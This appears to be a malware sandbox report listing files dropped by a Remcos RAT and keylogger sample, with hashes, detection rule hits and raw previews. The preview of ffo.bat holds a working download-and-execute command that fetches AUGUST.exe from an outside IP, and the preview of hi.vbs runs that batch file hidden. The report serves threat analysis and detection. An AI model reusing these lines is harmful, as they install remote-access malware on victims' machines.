Preview:	n@x.l@x.l@x.m@x.l@x.)@x.y@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@y.H.(.).,.H.5..2...&..:)...7..>4...`5..5$../...-..>4...5..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../1..4...)..(8x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../;..!..$.......m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.H.1.).*.1..../...4V.(.$..!.../..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x..rV.CuH._wx.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.

C:\Users\user\AppData\Local\Temp\ffaa04af

Download File

Process:	C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
File Type:	data
Category:	dropped
Size (bytes):	1234044
Entropy (8bit):	7.6624612503315905
Encrypted:	false
SSDEEP:	24576:t9gkqJElhex4JxOGn5LUw7ubDs7qWToVbRTx:t9g0exADLuXQHot
MD5:	F443C8A9C19FEBCFB401524451CDAD9C
SHA1:	393B05AE3F6CD6065FE579DBD2ADF242651CD343
SHA-256:	DB926DD230E09696D7A5FAB95BCD46D20C9FFB93EE638782279D254EDA53F81A
SHA-512:	CDDA03469A1880CB5FC0D9834B36F09E330312C5CCB0F9403FB4D87AC0BEF8E81F852C361D685816B683E3686FC17C6B63105C84BD53EB467F29CA97479C667D
Malicious:	false
Preview:	n@x.l@x.l@x.m@x.l@x.)@x.y@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@y.H.(.).,.H.5..2...&..:)...7..>4...`5..5$../...-..>4...5..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../1..4...)..(8x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../;..!..$.......m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.H.1.).*.1..../...4V.(.$..!.../..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x..rV.CuH._wx.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.

C:\Users\user\AppData\Local\Temp\mdvbfllr

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	500224
Entropy (8bit):	6.590620352205087
Encrypted:	false
SSDEEP:	6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
MD5:	6CA401F82443B673FCA7D7DDB0A05357
SHA1:	82E54CBDCF4E12A72A32E52E0FD03C095485B841
SHA-256:	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
SHA-512:	A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vqqcre

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	500224
Entropy (8bit):	6.590620352205087
Encrypted:	false
SSDEEP:	6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
MD5:	6CA401F82443B673FCA7D7DDB0A05357
SHA1:	82E54CBDCF4E12A72A32E52E0FD03C095485B841
SHA-256:	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
SHA-512:	A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wlxpec

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04 2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
Category:	dropped
Size (bytes):	890
Entropy (8bit):	5.066228614804709
Encrypted:	false
SSDEEP:	24:8SqYt6DDalXUfloI8LxdsAH8HnumtzRm:8SDt6DDalkoI8Lr9mtl
MD5:	D0AC5B93F6CDFE282AAA6194C5A10F1C
SHA1:	FF08B9FA987FA7BD5043FC9DE3ADCC5B8156E484
SHA-256:	E7F5CBDE249807D10A5489F65C4ABAB6CBEFC79D487BFEE948784141C3BD82D0
SHA-512:	1901907C679685C47352993CCA33643A08DD6FA069AF2EEED3661AE5F2E79A9614B5D5D903AE6C590B1E0E5E0F36CBEF9B2DFDD841C24E4834C12C28B11C31B5
Malicious:	false
Preview:	L..................F.... ....p..S...@F..S.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S....X9.S...i..S.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Ybp...........................^.A.p.p.D.a.t.a...B.V.1.....9Y.p..Roaming.@......EW<29Y.p..../.....................c\..R.o.a.m.i.n.g.....b.1.....9Y.p..RUY_DR~1..J......9Y.p9Y.p.............................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y.p9Y.p..........................d...D.Z.I.P.R...e.x.e.......g...............-.......f...........D4.O.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......506013...........hT..CrF.f4... .....G{...-...-$..hT..CrF.f4... .....G{...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\yigmovm

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	500224
Entropy (8bit):	6.590620352205087
Encrypted:	false
SSDEEP:	6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
MD5:	6CA401F82443B673FCA7D7DDB0A05357
SHA1:	82E54CBDCF4E12A72A32E52E0FD03C095485B841
SHA-256:	7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
SHA-512:	A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

C:\Users\user\AppData\Roaming\AUGUST.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4809996
Entropy (8bit):	7.988259707956486
Encrypted:	false
SSDEEP:	98304:+pbYDHaUeRG/GnYDievJRVrQo4QGB0s53+sTH7/93veWGLRHHk:+pbu9e+qYDiQf1hfGWsBVb/rGLhE
MD5:	25860926414BF43383246F7C773A8D6C
SHA1:	760390A4A14DF085F4C841067F52C79409CDC93E
SHA-256:	A8E552944846A2F5E8FEFEA4A250046DA29D74D1F58F7A868258E6DED9597958
SHA-512:	61825EF1B03F5516F2820FAAE3DAD01911054DEBB714B2162FD28CDC7C26199EB6174EDDB3E48A4B200C350A083A561A58BD2724496FCB71E87D4492E2EC5A07
Malicious:	true
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.......................................................................................0...............................text............................... ..`.rdata...0...0...2..................@..@.data...,)...p.......H..............@....rsrc................P..............@..@........U.......SVWj'.....u..v..=`2A..6P......P..e......~..v8.^..3......h.3A.P..........P......P..p1A..E..E....;F.r......P.,f..Y.-..j...t1A...t$..l....3.9..wA.t...@....9D$.t..t$.Ph.....5.wA....2A.3.....D$..`...\|$..u..@.....3.....D$...V...t...P.Q...^....T$.V.t$......f..BBFFf..u.^.L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q......3.9F.Y~.9F.~...f..Af..G@;F.\|..6....Y.F..>f.$G..^._^[...U..QQ..lwA..uVj.j..E.P.5.wA...l1A...t>.E.;E.w6r..E.;E.s,j*.....P.He.....YYt...(wA.j.....@... .

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04 2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
Category:	dropped
Size (bytes):	890
Entropy (8bit):	5.066228614804709
Encrypted:	false
SSDEEP:	24:8SqYt6DDalXUfloI8LxdsAH8HnumtzRm:8SDt6DDalkoI8Lr9mtl
MD5:	D0AC5B93F6CDFE282AAA6194C5A10F1C
SHA1:	FF08B9FA987FA7BD5043FC9DE3ADCC5B8156E484
SHA-256:	E7F5CBDE249807D10A5489F65C4ABAB6CBEFC79D487BFEE948784141C3BD82D0
SHA-512:	1901907C679685C47352993CCA33643A08DD6FA069AF2EEED3661AE5F2E79A9614B5D5D903AE6C590B1E0E5E0F36CBEF9B2DFDD841C24E4834C12C28B11C31B5
Malicious:	false
Preview:	L..................F.... ....p..S...@F..S.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S....X9.S...i..S.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Ybp...........................^.A.p.p.D.a.t.a...B.V.1.....9Y.p..Roaming.@......EW<29Y.p..../.....................c\..R.o.a.m.i.n.g.....b.1.....9Y.p..RUY_DR~1..J......9Y.p9Y.p.............................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y.p9Y.p..........................d...D.Z.I.P.R...e.x.e.......g...............-.......f...........D4.O.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......506013...........hT..CrF.f4... .....G{...-...-$..hT..CrF.f4... .....G{...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04 2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
Category:	dropped
Size (bytes):	890
Entropy (8bit):	5.066228614804709
Encrypted:	false
SSDEEP:	24:8SqYt6DDalXUfloI8LxdsAH8HnumtzRm:8SDt6DDalkoI8Lr9mtl
MD5:	D0AC5B93F6CDFE282AAA6194C5A10F1C
SHA1:	FF08B9FA987FA7BD5043FC9DE3ADCC5B8156E484
SHA-256:	E7F5CBDE249807D10A5489F65C4ABAB6CBEFC79D487BFEE948784141C3BD82D0
SHA-512:	1901907C679685C47352993CCA33643A08DD6FA069AF2EEED3661AE5F2E79A9614B5D5D903AE6C590B1E0E5E0F36CBEF9B2DFDD841C24E4834C12C28B11C31B5
Malicious:	false
Preview:	L..................F.... ....p..S...@F..S.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S....X9.S...i..S.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Ybp...........................^.A.p.p.D.a.t.a...B.V.1.....9Y.p..Roaming.@......EW<29Y.p..../.....................c\..R.o.a.m.i.n.g.....b.1.....9Y.p..RUY_DR~1..J......9Y.p9Y.p.............................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y.p9Y.p..........................d...D.Z.I.P.R...e.x.e.......g...............-.......f...........D4.O.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......506013...........hT..CrF.f4... .....G{...-...-$..hT..CrF.f4... .....G{...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	354304
Entropy (8bit):	6.005348176071358
Encrypted:	false
SSDEEP:	6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
MD5:	AD28D4167571382569D2384FFD7BD2A9
SHA1:	EFC7534BCB1645D4056702E073519F571D8DB77B
SHA-256:	F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
SHA-512:	8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8767704
Entropy (8bit):	7.112848215947183
Encrypted:	false
SSDEEP:	196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
MD5:	EC9CE1D67F98072281015C7726FBA245
SHA1:	E89B16265ACF4A251B527DDF22830F2650987263
SHA-256:	9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
SHA-512:	21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................

C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	data
Category:	dropped
Size (bytes):	975374
Entropy (8bit):	7.888212877886324
Encrypted:	false
SSDEEP:	24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
MD5:	4649F3A4E58C6040B07F6D486C149A71
SHA1:	64F8FC631C5FB4E5F6BC20C207047D8E2B500587
SHA-256:	5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
SHA-512:	4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
Malicious:	false
Preview:	...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...

C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm

Download File

Process:	C:\Users\user\DZIPR.exe
File Type:	data
Category:	dropped
Size (bytes):	72329
Entropy (8bit):	4.4816230098296295
Encrypted:	false
SSDEEP:	1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
MD5:	F125E72B3968CA233EF3C7E2F4DB34E7
SHA1:	4FB34044EF18CEDBD3EDE4272C44416D3F11735C
SHA-256:	CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
SHA-512:	B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
Malicious:	false
Preview:	]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...

C:\Users\user\AppData\Roaming\ffo.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.962458979597571
Encrypted:	false
SSDEEP:	3:mKDDGKSSJJFSpXLgLvzx0fyJAFAkKiv5iwW0r+KBpkiv5iwW0rv:hSGmp6vd0fy78ha0rhppha0rv
MD5:	174D3AD77319DC90564354CAD267DABF
SHA1:	B36284DCCF4F4D2A7E671D5A2F9DDA8197A4C351
SHA-256:	CE2A0FA3EF54C0596A6AA5E4D9E2F06943F0F7E38841823072BD37DF73C47569
SHA-512:	FA78883AF47A9B47D738DD8ACC2990A3CBA9339B8A762A7AC98114810A50F9085D223226D00944D814FCE5FF43114BC87656AFAF752D86AE08A8818B257A40FB
Malicious:	true
Preview:	@echo off..powershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exe..start %APPDATA%/AUGUST.exe..

C:\Users\user\AppData\Roaming\hi.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.948021064615188
Encrypted:	false
SSDEEP:	3:jaPFEm8nByK2qQANX4E71wivDWMZcNUqJajaPOUC:j6NqEK20XNNbWMiNUqOUC
MD5:	CAA7E3E2DB71FA6B41370A69D134FDBA
SHA1:	659CEC895D5348E9E1B85823CC9A8F0E165F21CF
SHA-256:	183E1E3B20EA35804DDF2D6102AA4E854730A93F076BB6FE43075B0394D18945
SHA-512:	346F1858A1861D16BF8E858867DEAA1653124085C0C320A2776C1A8131E93E6AF15156EC6B8457B3648F837485AD4EAC584EE83B859F97CBAA80F38B2BF68EFD
Malicious:	true
Preview:	Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0..Set WshShell = Nothing

C:\Users\user\DZIPR.dll

Download File

